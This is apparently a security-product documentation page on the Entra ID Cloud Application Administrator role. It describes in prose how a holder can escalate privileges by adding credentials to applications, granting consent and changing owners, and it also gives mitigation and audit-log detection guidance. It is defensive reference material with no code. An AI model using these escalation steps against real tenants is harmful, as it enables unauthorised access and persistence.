AZ_CLOUD_APP_ADMIN
Summary
FSProtect ACL Alias
AZ_CLOUD_APP_ADMIN
Entra ID (Azure AD) Alias
Cloud Application Administrator
Affected Object Types
App registrations (Applications) & Enterprise applications (Service Principals)
Exploitation Certainty
Certain
Graph Permission / Role
Membership in the Cloud Application Administrator directory role (direct assignment or via a role-assignable group). This role can manage enterprise apps and app registrations. It has the same permissions as Application Administrator, except it cannot manage Application Proxy.
Description
AZ_CLOUD_APP_ADMIN represents the ability for a principal to operate as a Cloud Application Administrator in Microsoft Entra ID.
A Cloud Application Administrator can create and manage applications in the tenant. This includes app registrations and enterprise applications. This role can manage application configuration and assignments.
By controlling application objects, an attacker can:
Add credentials (client secrets or certificates) to applications and service principals and impersonate them.
Modify application configuration that impacts authentication and access.
Grant consent to permissions (within role limits) and expand what an application can do.
Assign owners or change access paths to establish persistence.
Therefore, any identity that holds the Cloud Application Administrator role can escalate privileges by taking control of application identities and their permissions.
Identification
PowerShell (Microsoft Graph)
List all members of the Cloud Application Administrator role. If a group is assigned, expand it to identify effective users.
Azure CLI (read-only via Microsoft Graph)
Azure GUI
Exploitation
A Cloud Application Administrator can take control of application identities. This can be used to gain persistence and expand access.
Common high-impact actions include:
Adding new credentials (client secrets or certificates) to an application or service principal.
Modifying application configuration (reply URLs, certificates, claims, sign-in settings, and access assignments).
Granting consent to permissions (within role limits).
Assigning or changing owners on application objects.
Treat Cloud Application Administrator as a privileged role. Do not assign it broadly.
Mitigation
Keep Cloud Application Administrator assignments minimal.
Use PIM:
Prefer eligible assignments.
Require MFA and approvals for activation where appropriate.
Prefer custom roles with scoped application permissions where possible.
Minimize application owners and restrict who can manage credentials for sensitive apps.
Restrict who can grant admin consent and who can manage enterprise applications.
Review application credentials and permissions regularly for high-value apps.
Detection
Monitor Entra Audit logs for role assignment and application management actions.
Role assignment events:
Add member to role
Add eligible member to role (PIM)
Application change events (high risk):
Certificates and secrets management changes
Consent and permission grants
App role assignments added to service principals
Investigate:
Initiated by (actor)
Target resources
Time window and change ticket linkage
Alert on:
New Cloud Application Administrator assignments or activations.
Credential changes on sensitive apps by Cloud Application Administrators.
Consent or permission changes outside approved change windows.
References
https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/delegate-app-roles?utm_source=chatgpt.com
https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/permissions-reference?utm_source=chatgpt.com
https://learn.microsoft.com/en-us/graph/api/directoryrole-list-members?view=graph-rest-1.0&utm_source=chatgpt.com
https://learn.microsoft.com/en-us/graph/api/directoryrole-list?view=graph-rest-1.0&utm_source=chatgpt.com
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities?utm_source=chatgpt.com
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-audit-logs?utm_source=chatgpt.com
Last updated
Was this helpful?